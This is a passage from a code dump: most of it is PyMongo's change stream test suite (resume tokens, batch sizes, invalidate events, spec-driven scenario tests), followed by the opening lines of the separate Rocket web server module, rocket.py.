"get change from try_next")
self.assertEqual(set(listener.started_command_names()),
set(["getMore"]))
self.assertIsNone(stream.try_next())
def test_batch_size_is_honored(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
# Expected batchSize.
expected = {'batchSize': 23}
with self.change_stream_with_client(
client, max_await_time_ms=250, batch_size=23) as stream:
# Confirm that batchSize is honored for initial batch.
cmd = listener.results['started'][0].command
self.assertEqual(cmd['cursor'], expected)
listener.results.clear()
# Confirm that batchSize is honored by getMores.
self.assertIsNone(stream.try_next())
cmd = listener.results['started'][0].command
key = next(iter(expected))
self.assertEqual(expected[key], cmd[key])
# $changeStream.startAtOperationTime was added in 4.0.0.
@client_context.require_version_min(4, 0, 0)
def test_start_at_operation_time(self):
optime = self.get_start_at_operation_time()
coll = self.watched_collection(
write_concern=WriteConcern("majority"))
ndocs = 3
coll.insert_many([{"data": i} for i in range(ndocs)])
with self.change_stream(start_at_operation_time=optime) as cs:
for i in range(ndocs):
cs.next()
def _test_full_pipeline(self, expected_cs_stage):
client, listener = self.client_with_listener("aggregate")
results = listener.results
with self.change_stream_with_client(
client, [{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': expected_cs_stage},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({})
def test_iteration(self):
with self.change_stream(batch_size=2) as change_stream:
num_inserted = 10
self.watched_collection().insert_many(
[{} for _ in range(num_inserted)])
inserts_received = 0
for change in change_stream:
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
if inserts_received == num_inserted:
break
self._test_invalidate_stops_iteration(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.watched_collection().insert_one(inserted_doc)
        # Join with a large timeout to give the server time to return the
        # change, in particular on sharded clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.watched_collection().aggregate(
[{'$changeStream': {}}], maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.watched_collection().insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.change_stream(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name}
with self.change_stream() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.watched_collection().insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.watched_collection().update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
self.assertEqual({'updatedFields': {'new': 1},
'removedFields': ['foo']},
change['updateDescription'])
# Replace.
self.watched_collection().replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.watched_collection().delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self._test_get_invalidate_event(change_stream)
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.get_resume_token(invalidate=True)
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.change_stream(resume_after=resume_token)
# start_after can resume after invalidate.
with self.change_stream(start_after=resume_token) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class ProseSpecTestsMixin(object):
def _client_with_listener(self, *commands):
listener = WhiteListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def _populate_and_exhaust_change_stream(self, change_stream, batch_size=3):
self.watched_collection().insert_many(
[{"data": k} for k in range(batch_size)])
for _ in range(batch_size):
change = next(change_stream)
return change
def _get_expected_resume_token_legacy(self, stream,
listener, previous_change=None):
"""Predicts what the resume token should currently be for server
versions that don't support postBatchResumeToken. Assumes the stream
has never returned any changes if previous_change is None."""
if previous_change is None:
agg_cmd = listener.results['started'][0]
stage = agg_cmd.command["pipeline"][0]["$changeStream"]
return stage.get("resumeAfter") or stage.get("startAfter")
return previous_change['_id']
def _get_expected_resume_token(self, stream, listener,
previous_change=None):
"""Predicts what the resume token should currently be for server
versions that support postBatchResumeToken. Assumes the stream has
never returned any changes if previous_change is None. Assumes
listener is a WhiteListEventListener that listens for aggregate and
getMore commands."""
if previous_change is None or stream._cursor._has_next():
return self._get_expected_resume_token_legacy(
stream, listener, previous_change)
response = listener.results['succeeded'][-1].reply
return response['cursor']['postBatchResumeToken']
def _test_raises_error_on_missing_id(self, expected_exception):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.change_stream([{'$project': {'_id': 0}}]) as change_stream:
self.watched_collection().insert_one({})
with self.assertRaises(expected_exception):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def _test_update_resume_token(self, expected_rt_getter):
"""ChangeStream must continuously track the last seen resumeToken."""
client, listener = self._client_with_listener("aggregate", "getMore")
coll = self.watched_collection(write_concern=WriteConcern('majority'))
with self.change_stream_with_client(client) as change_stream:
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener))
for _ in range(3):
coll.insert_one({})
change = next(change_stream)
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener, change))
# Prose test no. 1
@client_context.require_version_min(4, 0, 7)
def test_update_resume_token(self):
self._test_update_resume_token(self._get_expected_resume_token)
# Prose test no. 1
@client_context.require_version_max(4, 0, 7)
def test_update_resume_token_legacy(self):
self._test_update_resume_token(self._get_expected_resume_token_legacy)
# Prose test no. 2
@client_context.require_version_min(4, 1, 8)
def test_raises_error_on_missing_id_418plus(self):
# Server returns an error on 4.1.8+
self._test_raises_error_on_missing_id(OperationFailure)
# Prose test no. 2
@client_context.require_version_max(4, 1, 8)
def test_raises_error_on_missing_id_418minus(self):
# PyMongo raises an error
self._test_raises_error_on_missing_id(InvalidOperation)
# Prose test no. 3
def test_resume_on_error(self):
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 5
def test_does_not_resume_fatal_errors(self):
"""ChangeStream will not attempt to resume fatal server errors."""
for code in _NON_RESUMABLE_GETMORE_ERRORS:
with self.change_stream() as change_stream:
self.watched_collection().insert_one({})
def mock_try_next(*args, **kwargs):
change_stream._cursor.close()
raise OperationFailure('Mock server error', code=code)
original_try_next = change_stream._cursor._try_next
change_stream._cursor._try_next = mock_try_next
with self.assertRaises(OperationFailure):
next(change_stream)
change_stream._cursor._try_next = original_try_next
with self.assertRaises(StopIteration):
next(change_stream)
# Prose test no. 7
def test_initial_empty_batch(self):
with self.change_stream() as change_stream:
# The first batch should be empty.
self.assertFalse(change_stream._cursor._has_next())
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_one_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
# Prose test no. 8
def test_kill_cursors(self):
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 9
@client_context.require_version_min(4, 0, 0)
@client_context.require_version_max(4, 0, 7)
def test_start_at_operation_time_caching(self):
# Case 1: change stream not started with startAtOperationTime
client, listener = self.client_with_listener("aggregate")
with self.change_stream_with_client(client) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertIsNotNone(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"))
# Case 2: change stream started with startAtOperationTime
listener.results.clear()
optime = self.get_start_at_operation_time()
with self.change_stream_with_client(
client, start_at_operation_time=optime) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertEqual(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"), optime, str([k.command for k in
listener.results['started']]))
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_empty_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self.assertIsNone(change_stream.try_next())
resume_token = change_stream.resume_token
response = listener.results['succeeded'][0].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_exhausted_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self._populate_and_exhaust_change_stream(change_stream)
resume_token = change_stream.resume_token
response = listener.results['succeeded'][-1].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_empty_batch_legacy(self):
resume_point = self.get_resume_token()
        # Empty resume token when neither resumeAfter nor startAfter is specified.
with self.change_stream() as change_stream:
change_stream.try_next()
self.assertIsNone(change_stream.resume_token)
# Resume token value is same as resumeAfter.
with self.change_stream(resume_after=resume_point) as change_stream:
change_stream.try_next()
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_exhausted_batch_legacy(self):
# Resume token is _id of last change.
with self.change_stream() as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
resume_point = change['_id']
# Resume token is _id of last change even if resumeAfter is specified.
with self.change_stream(resume_after=resume_point) as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
# Prose test no. 13
def test_resumetoken_partially_iterated_batch(self):
# When batch has been iterated up to but not including the last element.
# Resume token should be _id of previous change document.
with self.change_stream() as change_stream:
self.watched_collection(
write_concern=WriteConcern('majority')).insert_many(
[{"data": k} for k in range(3)])
for _ in range(2):
change = next(change_stream)
resume_token = change_stream.resume_token
self.assertEqual(resume_token, change["_id"])
def _test_resumetoken_uniterated_nonempty_batch(self, resume_option):
# When the batch is not empty and hasn't been iterated at all.
# Resume token should be same as the resume option used.
resume_point = self.get_resume_token()
# Insert some documents so that firstBatch isn't empty.
self.watched_collection(
write_concern=WriteConcern("majority")).insert_many(
[{'a': 1}, {'b': 2}, {'c': 3}])
# Resume token should be same as the resume option.
with self.change_stream(
**{resume_option: resume_point}) as change_stream:
self.assertTrue(change_stream._cursor._has_next())
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 14
@client_context.require_no_mongos
def test_resumetoken_uniterated_nonempty_batch_resumeafter(self):
self._test_resumetoken_uniterated_nonempty_batch("resume_after")
# Prose test no. 14
@client_context.require_no_mongos
@client_context.require_version_min(4, 1, 1)
def test_resumetoken_uniterated_nonempty_batch_startafter(self):
self._test_resumetoken_uniterated_nonempty_batch("start_after")
# Prose test no. 17
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_startafter_after_empty_getMore(self):
# Resume should use startAfter after no changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
change_stream.try_next() # No changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
# Prose test no. 18
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_resumeafter_after_nonempty_getMore(self):
# Resume should use resumeAfter after some changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
self.watched_collection().insert_one({})
next(change_stream) # Changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
class TestClusterChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
self.skipTest("cluster-level change streams cannot be invalidated")
def _test_get_invalidate_event(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _test_invalidate_stops_iteration(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
db = random.choice(self.dbs)
collname = self.id()
self._insert_and_check(change_stream, db, collname, doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self._insert_and_check(
change_stream, db, collname, {'_id': collname}
)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.client.admin.aggregate(
[{'$changeStream': {'allChangesForCluster': True}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({'allChangesForCluster': True})
class TestDatabaseChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the database invalidates the change stream.
change_stream._client.drop_database(self.db.name)
def _test_get_invalidate_event(self, change_stream):
# Cache collection names.
dropped_colls = self.db.list_collection_names()
# Drop the watched database to get an invalidate event.
self.generate_invalidate_event(change_stream)
change = change_stream.next()
# 4.1+ returns "drop" events for each collection in dropped database
# and a "dropDatabase" event for the database itself.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
for _ in range(len(dropped_colls)):
ns = change['ns']
self.assertEqual(ns['db'], change_stream._target.name)
self.assertIn(ns['coll'], dropped_colls)
change = change_stream.next()
self.assertEqual(change['operationType'], 'dropDatabase')
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {'db': change_stream._target.name})
# Get next change.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def _test_invalidate_stops_iteration(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._client.drop_database(self.db.name)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], (
'drop', 'dropDatabase', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
self._insert_and_check(change_stream, self.id(), doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self._insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()})
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs")
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one({'_id': uuid.uuid4()})
self._insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()})
self.client.drop_database(other_db)
class TestCollectionChangeStream(TestChangeStreamBase, APITestsMixin,
ProseSpecTestsMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
def setUp(self):
# Use a new collection for each test.
self.watched_collection().drop()
self.watched_collection().insert_one({})
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].get_collection(
self.watched_collection().name).watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the collection invalidates the change stream.
change_stream._target.drop()
def _test_invalidate_stops_iteration(self, change_stream):
self.generate_invalidate_event(change_stream)
        # Check drop and invalidate events.
for change in change_stream:
self.assertIn(change['operationType'], ('drop', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_get_invalidate_event(self, change_stream):
        # Drop the watched collection to get an invalidate event.
change_stream._target.drop()
change = change_stream.next()
# 4.1+ returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {
'db': change_stream._target.database.name,
'coll': change_stream._target.name})
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def insert_one_and_check(self, change_stream, doc):
self.watched_collection().insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns'], {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name})
self.assertEqual(change['fullDocument'], doc)
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.watched_collection(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(encode({'_id': 1}))
self.watched_collection().insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns']['db'], self.watched_collection().database.name)
self.assertEqual(
change['ns']['coll'], self.watched_collection().name)
self.assertEqual(change['fullDocument'], raw_doc)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
options = self.watched_collection().codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
_ = change_stream.next()
resume_token = change_stream.resume_token
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.watched_collection().codec_options.with_options(
document_class=document_class)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
_ = change_stream.next()
resume_token = change_stream.resume_token
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.watched_collection(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.watched_collection(read_concern=ReadConcern('majority'))
with coll.watch():
pass
class TestAllScenarios(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.listener = WhiteListEventListener("aggregate")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client.close()
def setUp(self):
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [
(scenario_dict["database_name"], scenario_dict["collection_name"]),
(scenario_dict["database2_name"], scenario_dict["collection2_name"]),
]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams'
)
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
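# For example (added for illustration), typical change stream option names
# from the spec files map as follows:
#     camel_to_snake("resumeAfter")          -> "resume_after"
#     camel_to_snake("startAtOperationTime") -> "start_at_operation_time"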
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in iteritems(options):
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation.get("arguments", {})
if opname == 'rename':
# Special case for rename operation.
arguments = {'new_name': arguments["to"]}
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def assert_dict_is_subset(superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id"]
for key, value in iteritems(subdict):
if key not in superdict:
            assert False, "expected key %r not found in %r" % (key, superdict)
if isinstance(value, dict):
assert_dict_is_subset(superdict[key], value)
continue
if key in exempt_fields:
superdict[key] = "42"
assert superdict[key] == value
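# For example (added for illustration), the expectation on the right is
# satisfied: every expected key/value is present, nested dicts are compared
# recursively, and exempt fields such as "_id" match any value:
#
#     assert_dict_is_subset(
#         {'operationType': 'insert', '_id': {'_data': 'abc123'},
#          'ns': {'db': 'test', 'coll': 'c'}, 'fullDocument': {'x': 1}},
#         {'operationType': 'insert', '_id': '42', 'ns': {'db': 'test'}})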
def check_event(event, expectation_dict):
if event is None:
raise AssertionError
for key, value in iteritems(expectation_dict):
if isinstance(value, dict):
assert_dict_is_subset(
getattr(event, key), value
)
else:
assert getattr(event, key) == value
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
is_error = test["result"].get("error", False)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"].get("success", []))
changes = [
change_stream.next() for _ in range(num_expected_changes)]
# Run a next() to induce an error if one is expected and
# there are no changes.
if is_error and not changes:
change_stream.next()
except OperationFailure as exc:
if not is_error:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
for change, expected_changes in zip(changes, test["result"]["success"]):
assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
for expectation in test.get("expectations", []):
for idx, (event_type, event_desc) in enumerate(iteritems(expectation)):
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
check_event(event, event_desc)
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == '__main__':
unittest.main()
|
rocket.py
|
# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Import System Modules
import sys
import errno
import socket
import logging
import platform
import traceback
# Define Constants
VERSION = '1.2.4'
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = 'Rocket %s' % VERSION
HTTP_SERVER_SOFTWARE = '%s Python/%s' % (SERVER_SOFTWARE, sys.version.split(' ')[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 1 # in secs
THREAD_STOP_CHECK_INTERVAL = 1 # in secs, How often should threads check for a server stop message?
IS_JYTHON = platform.system() == 'Java' # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(LISTEN_QUEUE_SIZE = DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS = DEFAULT_MIN_THREADS,
MAX_THREADS = DEFAULT_MAX_THREADS)
PY3K = sys.version_info[0] > 2
class NullHandler(logging.Handler):
"A Logging handler to prevent library errors."
def emit(self, record):
pass
if PY3K:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
